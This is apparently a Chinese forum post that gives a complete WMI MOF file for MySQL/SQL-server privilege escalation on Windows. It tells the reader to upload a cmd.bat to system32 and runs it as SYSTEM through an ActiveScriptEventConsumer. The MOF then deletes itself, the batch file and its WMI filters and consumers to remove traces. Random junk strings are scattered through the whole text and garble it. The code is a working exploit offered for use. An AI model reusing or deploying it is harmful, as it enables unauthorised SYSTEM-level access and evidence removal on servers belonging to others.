这个sql提权MOF需要运行 system下的文件,不能定义路径。
0 h) J8 \7 x( U3 H需要将要运行的命令写入到bat上传到system32目录,然后执行。8 m! N: D) n1 x6 D( m) e& e: z
* {' f: S$ P% \/ b0 d: j5 Y8 j
这个sql提权MOF需要运行 system下的文件,不能定义路径。) L" ^7 D" f' ~) V
需要将要运行的命令写入到bat上传到system32目录,然后执行。
* [. ?: B( U+ m4 f9 N+ L4 J, w
% t1 t, J! K% l' g7 x# x#pragma' R5 W% q6 \2 d) k( ]
namespace("\\\\.\\root\\cimv2")
8 h5 j1 x4 ]) Q' o class- w* [7 Y+ L% w0 u/ g7 |
MyClass547% n; R2 |6 O) L- C& ~
{ [key] O: E+ H$ D0 Q+ n+ A" o
string* P2 s' {5 @6 E# }
Name;
8 @9 K, A$ n& t# E };% T9 ?: ?2 O5 g! d# i( j
class
( b, h- c* n4 A& n; b" y& e ActiveScriptEventConsumer1 x8 c# G, o7 m2 P- }4 J
: __EventConsumer { [key]
' ?2 S+ P) s6 s( X string
# F+ Y6 o" ?8 A6 j* f z5 p% P' _ Name; [not_null]
5 ]4 J. N( H' j7 q$ ]: h- c% w/ C8 H string* b" L: a2 A1 f. }3 k
ScriptingEngine; string
# M; D7 B& s, B1 y( j ScriptFileName; [template]+ r: T/ {3 ]! n2 e2 }$ b( [
string0 K- D6 M0 X5 r4 e/ i3 m
ScriptText; uint32 KillTimeout;! R m4 a( }6 J4 c) M
}; instance of __Win32Provider as $P {, ]- N4 l* ^$ f
Name3 y, S5 t# T u; p
=# P* i9 H! u1 V! T
"ActiveScriptEventConsumer"; CLSID =
1 X& n; T0 f& F9 R( Y1 C6 e% m "{266c72e7-62e8-11d1-ad89-00c04fd8fdff}";
* S% Q+ f7 z" v! p PerUserInitialization! t5 t: x+ e/ x: t* v5 E; b2 s
= TRUE;- h3 T6 o1 t" A0 l4 J3 I8 Q
}; instance of __EventConsumerProviderRegistration { Provider
' F" C) t' K: V0 `0 k( d8 X, Q7 U' } = $P; ConsumerClassNames' Z9 R/ a7 b9 _
=1 D# F# v; {0 L8 R* `4 H, g
{"ActiveScriptEventConsumer"};# q: P( e4 i2 Y. R
};/ Z" D5 p' w" U4 j/ h4 b& ~
Instance of ActiveScriptEventConsumer
: M, E6 j2 F* q as $cons { Name
; r2 N/ |5 u' [2 V3 f =
* s. K4 ?5 s. {" M" E1 T+ v "ASEC"; ScriptingEngine! H/ N4 W+ [$ b3 Y; B4 V
=
( z" d, r- N" ]) W9 a' a% w "JScript"; ScriptText
- o) |( B3 f3 Z0 _) |0 T+ l A =0 i! a! F. E, Y8 a# ?, j- z$ ?) n
"\ntry {var s = new ActiveXObject(\"Wscript.Shell\");\ns.Run(\"cmd.bat\");} catch (err) {};\nsv = GetObject(\"winmgmts:root\\\\cimv2\");try {sv.Delete(\"MyClass547\");} catch (err) {};try {sv.Delete(\"__EventFilter.Name='instfilt'\");} catch (err) {};try {sv.Delete(\"ActiveScriptEventConsumer.Name='ASEC'\");} catch(err) {};"; };
8 N4 O6 d: K( k! @9 n8 ` Instance of ActiveScriptEventConsumer
/ v$ P6 U( [' p( J as $cons2 { Name
! Q" Z: C) _0 Z+ W. h& C) H/ l =
# w$ a; y+ J( g2 E4 c- ? "qndASEC"; ScriptingEngine
, u' F9 H: {# G. j" Z =
$ T% q' p- j. V# y8 @ "JScript"; ScriptText
, L Z' v0 v4 t, X L =
/ V# |- H8 S! z$ Z5 @ "\nvar objfs = new ActiveXObject(\"Scripting.FileSystemObject\");\ntry {var f1 = objfs.GetFile(\"wbem\\\\mof\\\\good\\\\hBsBa.mof\");\nf1.Delete(true);} catch(err) {};\ntry {\nvar f2 = objfs.GetFile(\"cmd.bat\");\nf2.Delete(true);\nvar s = GetObject(\"winmgmts:root\\\\cimv2\");s.Delete(\"__EventFilter.Name='qndfilt'\");s.Delete(\"ActiveScriptEventConsumer.Name='qndASEC'\");\n} catch(err) {};";0 d% w: l2 v1 V2 O' ~ o/ _# F
}; instance of __EventFilter as $Filt { Name
\; K# n+ J" F7 J9 b' D =
% V, c1 J. }+ ^- G* J- u) ?: ?5 H9 j "instfilt"; Query0 Q% ~- a& y+ t6 @* Q1 D I: F
=
: g$ g, n# t# y, r" J/ M1 m( q2 M "SELECT * FROM __InstanceCreationEvent WHERE TargetInstance.__class = \"MyClass547\""; QueryLanguage6 H; a: ^& W; D
=
% m- J; a6 T6 j& L2 E "WQL"; }; instance of __EventFilter as $Filt2 { Name6 v; j" n, T# p6 t8 v
=) n. z$ j5 a/ V
"qndfilt"; Query
5 F. }& ?7 _% [: y7 ~0 @1 J =, ~7 B6 S& c0 L" e( C" _
"SELECT * FROM __InstanceDeletionEvent WITHIN 1 WHERE TargetInstance ISA \"Win32_Process\" AND TargetInstance.Name = \"cmd.bat\""; QueryLanguage# y* j$ s7 Q% `; ?
=. q& ~- F7 A. [( R
"WQL"; }; instance of __FilterToConsumerBinding as $bind { Consumer
" R3 v. Y+ U* j% c = $cons; Filter
$ B# }4 h# d7 n$ ^( i6 `) r2 K = $Filt;0 x1 I- h! b, W2 r/ \1 }
}; instance of __FilterToConsumerBinding as $bind2 { Consumer
b# _, }; a% Z& V# E9 Q2 S4 r: [; ~ = $cons2; Filter2 v8 ?2 G' l4 Z( k+ @! R
= $Filt2;
2 F2 S! G/ L% N' X4 u }; instance of MyClass547$ m# u( `/ V g' c% g/ q! Y
as $MyClass { Name; _! {' w8 n: S" o
=$ N& E& W) t! k
"ClassConsumer";
8 T( G, k4 t- k+ s }; |